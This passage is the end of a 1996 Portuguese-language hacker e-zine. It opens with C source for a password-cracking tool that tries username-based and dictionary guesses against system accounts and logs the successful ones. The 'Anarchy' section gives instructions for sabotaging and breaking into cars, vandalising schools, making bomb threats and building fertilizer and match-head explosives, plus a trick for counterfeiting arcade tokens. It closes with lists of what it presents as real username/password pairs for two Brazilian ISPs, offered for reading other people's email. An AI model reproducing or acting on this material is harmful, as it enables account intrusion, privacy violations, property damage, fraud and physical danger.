   homedir = pwentry->pw_dir;
  shell = pwentry->pw_shell;
}



/* Set the filename of the password file to be used, default is
   /etc/passwd */

void pwfile_name( void )
{
if (pwfile != NULL)
    setpwfile(pwfile);
}



/* Burst mode, tries user i.d. & then reverses it as possible passwords
   on every account found in the password file */

void burst_mode( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
      try_word( logname );
     reverse_word( logname );
  }

endpwent();
}


/* Mini-burst mode, try above combinations as well as other strategies
   which include adding numbers to the end of the user i.d. to generate
   passwords or using the comment field information in the password
   file */

void mini_burst( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
     word_strat();
  }

endpwent();
}


/* Brute force mode, uses all the above strategies as well using a
   dictionary file to generate possible passwords */

void brute_force( void )
{
pwfile_name();
setpwent();

  if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
     printf("Sorry - User unknown\n");
     exit(0);
  }
  else
  {
     user_info();
      word_strat();
     do_dict();
  }

endpwent();
}


/* Calls the various password guessing strategies */

void word_strat()
{
 try_word( logname );
  reverse_word( logname );
   add_nums( logname );
  do_comment( comment );
}


/* Takes the user name as its argument and then generates possible
   passwords by adding the numbers 0-9 to the end. If the username
   is greater than 7 characters, don't bother */

void add_nums( char *wd )
{
int i;
char temp[2], buff[WORDSIZE];

if (strlen(wd) < 8) {

  for (i = 0; i < 10; i++)
  {
      strcpy(buff, wd);
       sprintf(temp, "%d", i);
	strcat(wd, temp);
       try_word( wd );
      strcpy(wd, buff);
  }

 }
}



/* Gets info from the 'gecos' comment field in the password file,
   then process this information generating possible passwords from it */

void do_comment( char *wd )
{
FILE *fp;

char temp[2], buff[WORDSIZE];
int c,  flag;

flag = 0;


/* Open file & store users gecos information in it. w+ mode
   allows us to write to it & then read from it. */

if ((fp = fopen("gecos", "w+")) == NULL) {
    printf("Error writing gecos info\n");
   exit(0);
}

    fprintf(fp, "%s\n", wd);
   rewind(fp);

strcpy(buff, "");


/* Process users gecos information, separate words by checking for the
   ',' field separater or a space. */

while ((c = fgetc(fp)) != EOF)
{

 if (( c != ',' ) && ( c != ' ' )) {
     sprintf(temp, "%c", c);
    strncat(buff, temp, 1);
 }
 else
    flag = 1;


   if ((isspace(c)) || (c == ',') != NULL) {

     if (flag == 1) {
	c=fgetc(fp);

	if ((isspace(c)) || (iscntrl(c) == NULL))
	   ungetc(c, fp);
     }

     try_word(buff);
      reverse_word(buff);
       strcpy(buff, "");
      flag = 0;
     strcpy(temp, "");
   }

}
fclose(fp);
remove("gecos");
}



/* Takes a string of characters as its argument(in this case the login
   i.d., and then reverses it */

void reverse_word( char *wd )
{
char temp[2], buff[WORDSIZE];
int i;

i = strlen(wd) + 1;
 strcpy(temp, "");
strcpy(buff, "");

 do
 {
    i--;
    if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
	sprintf(temp, "%c", wd[i]);
       strncat(buff, temp, 1);
    }

 } while(i != 0);

if (strlen(buff) > 1)
   try_word(buff);
}



/* Read one word at a time from the specified dictionary for use
   as possible passwords, if dictionary filename is NULL, ignore
   this operation */

void do_dict( void )
{
FILE *fp;
char buff[WORDSIZE], temp[2];
int c;

strcpy(buff, "");
strcpy(temp, "");


if (dict == NULL)
   exit(0);

   if ((fp = fopen(dict, "r")) == NULL) {
       printf("Error opening dictionary file\n");
      exit(0);
   }

rewind(fp);


 while ((c = fgetc(fp)) != EOF)
 {
  if ((c != ' ') || (c != '\n')) {
     strcpy(temp, "");
      sprintf(temp, "%c", c);
     strncat(buff, temp, 1);
  }

  if (c == '\n') {
    if (buff[0] != ' ')
       try_word(buff);

      strcpy(buff, "");
  }
 }

fclose(fp);
}


/* Process the word to be used as a password by stripping \n from
   it if necessary, then use the pwdauth() function, with the login
   name and word to attempt to get a valid id & password */

void try_word( char pw[] )
{
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];

strcpy(buff, "");
pwlength = strlen(pw);

for (i = 0; i != pwlength; i++)
{

 if (pw[i] != '\n') {
     strcpy(temp, "");
     sprintf(temp, "%c", pw[i]);
    strncat(buff, temp, 1);
 }
}

 if (strlen(buff) > 3 ) {
     printf("Trying : %s\n", buff);

     if (pwstat = pwdauth(logname, buff) == NULL) {
	 printf("Valid Password! - writing details to 'data'\n");

	 write_details(buff);

	if (strcmp(mode, "f") == NULL)
	   exit(0);
     }
 }
}



/* If valid account & password, store this, along with the accounts
   uid, gid, comment, homedir & shell in a file called 'data' */

void write_details( char *pw )
{
FILE *fp;

if ((fp = fopen(OUTFILE, "a")) == NULL) {
    printf("Error opening output file\n");
   exit(0);
}

fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
 fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
fclose(fp);
}

---CORTE AQUI-----------------------------------------------------------

Bom... pra compilar isso escreva:

$ gcc shcrack.c -o shcrack

Ou tente!

$ acc shcrack.c -o shcrack

Isso pode variar dependendo do seu compilador.


}-===============================[chain]===============================-{                        

9-) ANARCHY
    ~~~~~~

Como mandar um carro para o inferno!    
----------------------------------------------

Existem mil maneiras de destruir um carro mas lembre-se que isso pode ser
divertido para voce, destrutivo para alguem e dificil dos policiais pegar.

- Coloque uma bomba de CO2 perto do tanque de gasolina. 

- Coloque sujeira, acucar ( esse eВґ bom ), uma bolinha de ping-pong ou al-
  guma coisa que dissolva no tanque de gasolina.

- Plastico deforma  e dilue dentro do tanque. O resultado final e dificul-
  dade de injetar gasolina. Causando possivelmente a troca da valvula.

- Uma boa e coloca, pedras, bananas, alguma coisa que  vai tampar dentro 
  do cano de descarga.
  * Use um pedaco de pau para empurrar para dentro.

- Coloque um fio comprido no tanque de gasolina e acenda ele.

- Roube a chave, tire uma copia, coloque ela no lugar novamente e roube o
  som do carro.

- Arrombe o carro. Corte um pedacao de metal fino parecido com o desenho:


	     Ú-Ä¿    OBS.:VEJA O DESENHO COM MODO TERMINAL PARA ENTENDER
	     Ві  Ві
	     Ві  Ві
	     Ві  Ві
	     Ві  Ві
	     Ві ГљГ™
	     Ві ГЂВї
	     ÀÄÄÙ

Faca a operacao do lado de fora do carro. Coloque do lado de fora do vi-
dro forcando o cabo o qual vai desbloquear a porta. Essa tecnica e conhe-
cida como SLIM JIM. Agora voce pode roubar o som, equalizador, detector 
de radar. 
Dica: Para destruir o interior do carro jogue um cachorro ou um gato. Um 
pato tambem serve por nao ter bons habitos de higiene.

- Expelhos restrovisores sao muito facil de ser arrancados. Geralmente 
empurrando do lado expelhado eles quebram.

- Faca uma bola de DUREPOX com 3 ou 4 pregos, coloque em baixo do pneu.

- Pode tambem usar um anel para arranhar as portas.



Voce odeia a sua escola?
----------------------------
by HaphazarD - Brazil - Global Domination inc.


- Realmente a minha favorita e passar cola ( melhor usar cola de sapatei-
  ro ) nas fechaduras da entrada e por tudo onde for possivel.

- Voce pode tambem colocar uma bomba no banheiro, ou simplesmente colocar 
  uma falsa bomba no banheiro, certamente eles terao que investigar e sus-
  penderao as aulas naquele dia.

- Peque um pouco de potassio puro ou sodio puro, coloque isso em uma capsu-
  la e manda embora com a descarga do banheiro ( cheiro podre! )

- Coloque uma granada com cigarro no hall de entrada! Uma bomba normal com 
  pavio de cigarro, que demora em media 15 minutos para explodir, enquando 
  voce esta na sua sala de aula e vai ouvir o barrulho junto aos seus ami-
  gos.

- Roube senhas ou chaves de computadores. Ou roube o cartao de 80 colunas 
  que tem dentro dos IBMs.

- Mande uma carta para sua escola com um disco de 1.2 ou um de 1.44, 
  ( segredo: coloque dentro do disco pedacos pequenos de imans ). Para pa-
  recer real coloque uma etiqueta bonita e diga na carta que e' um novis-
  simo anti-virus que esta sendo mandado para todas as escolas.
  Se preciso falsifique o simbolo do governo do estado.

- Jogue seu chiclete no carpete da biblioteca ou alguma coisa que grude 
  bastante. 
  Fique cuidando os auxiliares de disciplina chorarem.

- Pinte no murro da escola que o diretor e' facista.

- Coloque uma batata no cano de descarga do diretor.

- Pegue um virus em uma BBS e infecte os computadores deles.
  De preferencia se tiver Word ou Excel... argg....

- Use um clips prendendo-o com uma borracha. ( para nao ser eletrocutado )  
  coloque ele na tomada, a maneira mais facil de queima-la.





Como fazer uma bomba de fertilizante
---------------------------------------------

Ingredientes:

- Jornal
- Fertilizante ( escolha o tipo quimico )
- Algodao 
- Diesel ( combustivel ) 

Faca um montinho de jornal e coloque um pouco de fertilizante dentro.
Coloque algodao sobre ele e entao ensope o  algodao com o diesel.
Acenda e depois corra como voce nunca correu antes. A explosao Г© violen-
ta portanto nao faca isso em ambiente fechados.





Bola de tenis bomba
---------------------

Ingredientes:

- Milhoes de cabeca de palito
- Uma bola de tenis
- Uma faca bem afiada
- Fita bem forte

Depois de arrancar uma tonelada de cabeca de palito de fosforo corte um 
PEQUENO buraco em uma bola de tenis.
Encha a bola com as cabecas de palitos ate nao ter mais espaco nenhum.
Fique certo que isso eВґmuito legal mesmo!
Bom, quando voce ver algum amigo andando na rua jogue nele. Ele vai le-
var o maior susto com o estouro.




Como jogar fliperama de graca
------------------------------

Ingredientes:

- Tampas de garrafa
- Vela branca grossa
- Faca bem afiada
- Uma ficha de fliperama original

Corte a vela em pequenas rodelas parecidas com a ficha.
Amasse bem as tampinhas de modo que fiquem muito finas, e entao coloque 
as laminas metalicas dentro das da vela.
Nao esqueca de dar o formato das entradas moldados na cera entao deixe 
elas no refrigerador por umas 5 horas ate ficar bem duras.




}-===============================[chain]===============================-{                        



10-) CARTAS
     ~~~~~~

Nao tem carta nao, simplesmente pelo fato de que estamos comecando, entao 
se  voce  tem alguma duvida, comentario, critica, dica ou mesmo quer fazer 
parte da equipe que vai comecar a distribuir nossa revista entre em conta-
to com:

AciDmuD - acidmud@thepentagon.com
VooDoo  - voodoo@deathsdoor.com   
HaphazarD - por minha parte falar sobre anarchy nao darei meu e-mail


Para que sua BBS receba sempre um exemplar primeiro que os outros escreva-nos
Prometemos publicar todo material que nos for enviado, claro depois de avali-
ado. Tambem nao vamos colocar lixo e besteiras...
Se voce achar algum erro em nosso material escreva-nos por favor.
Sua participacao e'muito importante para nos, pois soh assim continuaremos
com nosso zine.

Voce pode nos encontrar tambem no canal #hackers e #bluebox nos servidores 
de irc brasileiros. ex: irc.kanopus.com.br e irc.bsi.com.br
AVISO: Nao distribua essa revista para pessoas que trabalhem em provedores.



***************************************************************************
BONUS EXTRA --------------------------------- senhas de provedores
***************************************************************************
(c)1996 Reg. by AciDmuD & VooDoo Global Domination Inc.

Cortesia de AciDmuD e VooDoo servindo a comunidade hacker e contribuindo
com a DESTRUICAO dos provedores
Obs.: Provedores com precos abusivos. OnLy!



E'... pra ver como nos somos generosos. Ai estao algumas senhas de dois
grandes provedores brasileiros, um de Sao Paulo e outro de Joinville -SC.
Com essas senhas alem de acessar a inet de graca voce pode ler o mail de
outras pessoas somente trocando a configuracao do seu software de mail.
Tipo... substitua onde diz: seu.provedor.com.br por kanopus.com.br
Onde tem o login voce deve colocar o novo login com sua respectiva senha.
Pode usar o soft de telnet para acessar a esses users.
Onde for netville use: netville.com.br
Para ler os mails escreva no prompt do telnet.

$ mail

Vai aparecer uma lista que voce pode acessar por meio dos numeros.
-----------------------------------------------------------------------
SE SEU NOME APARECE NA LISTA ABAIXO NAO SE OFENDA. ALEM DE VOCE SER PES-
SIMO NA ESCOLHA DA SENHA SEU PROVEDOR E' UMA M3RD4....
-----------------------------------------------------------------------
---->>>  Mes que vem tem as senhas da ELOGICA e da BRAZNET  <<<-----
                                                
   - KANOPUS -

LOGIN         SENHA
-----         -----
help          help
funcao.help   help
gr3350        123
fwa           1234
gr2502        12345
gr4240        1961
niki          1963
wellner       1978
c.surek       1996
danielbr      zool
anafonso      zool
veralm        zool
agenor        agenor
apsoft        alex
mggatech      arcadia
axel          axel
uteste        banana
demo15        banana
artes         banana
viana         behrens
farinha       brasilia
nr7pcmso      cad
carolina      carolina
cecilia       cecilia
nepomoceno    claudio
gr5035        claudio
gr6000        claudio
costa         costa
customer      customer
dag           dag
danielle      danielle
ecg840        deborah
teodoro       digital
dgavden       duncan
eliane        eliane
email         email
reginato      emilia
harbar        eugenio 
fernando      fernando
florinda      florinda
sandor        gabriel
thomaz        guipar
helio         helio
siqueira      hendrix
hermes        hermes
clsb          ibm
mruiz         irina
hideko        iris
jere          jere
wap           julio
hell          joplin
grios         jessi
uruzinho      jesus
grios         jessi


    - NETVILLE -

LOGIN         SENHA
-----         -----
agenciaa      public
acf01         andre
baf           1950
peters        1960
homke         1994
ivansky       1996
aro           1998
lineu         alexia
garcia        aline
jba           ana 
guido         andrey
petit         angelico
cetil         arosa 
jardim        arte
eder          base
acs           brenda
marquiot      bruna
fgomes        cardinal
adelar        carla
profit        carlos
cboff         carmem
eydiniz       carol
wlau          carol
schulz        change
lula          cherry
hahnte        chicago
shb           cris
dminatti      data
festugat      debi
cfzucco       debora
raso          denis
adelor        diego
grafos        dino
magno         disney
igorz         flora
brach         floyd
marias        fred
anaclara      gabriel
mserv         gabriel
blinz         golf
ascensao      grith
langsch       honda
shiino        honda
wiletrup      honda
peninha       jake
kids          joshi
mrmobius      jumar
labirint      karl
fabiola       lara
baptista      laura
dornel        lili
like2net      net
rhl2net       odessa
cdsanjos      palma
prf2net       paulo
psb01         pedro
lotario       perry
spiazera      pia
ruben         raquel
maine         rock
nucleo        rodrigo
scarlet       scarlet
edukato       dudu
dopke         earth
polido        edna
aerton        elaine
bragam        silvio
manz          fana
cordeaca      timmy
flaps         tito
datasul       transfer
jbone22i      valdivia
deli          viktoria
smachado      viper
ruwan         wizard
sasse         wolfgang
matheus       aloha
berg          berg
preprint      bureau
cristaos      call
hansa         cargo
momento       chosse
airton        cinema
claudia       clad
simetria      clash
jms           disco
danca         festival

***************************************************************************
BONUS EXTRA --------------------------------- senhas de provedores
***************************************************************************


   - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS -
- AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 -
		   - = = =  DiA  01 De FEVEREiRO = = = -
           		EM TODAS AS BBSz UNDERGROUND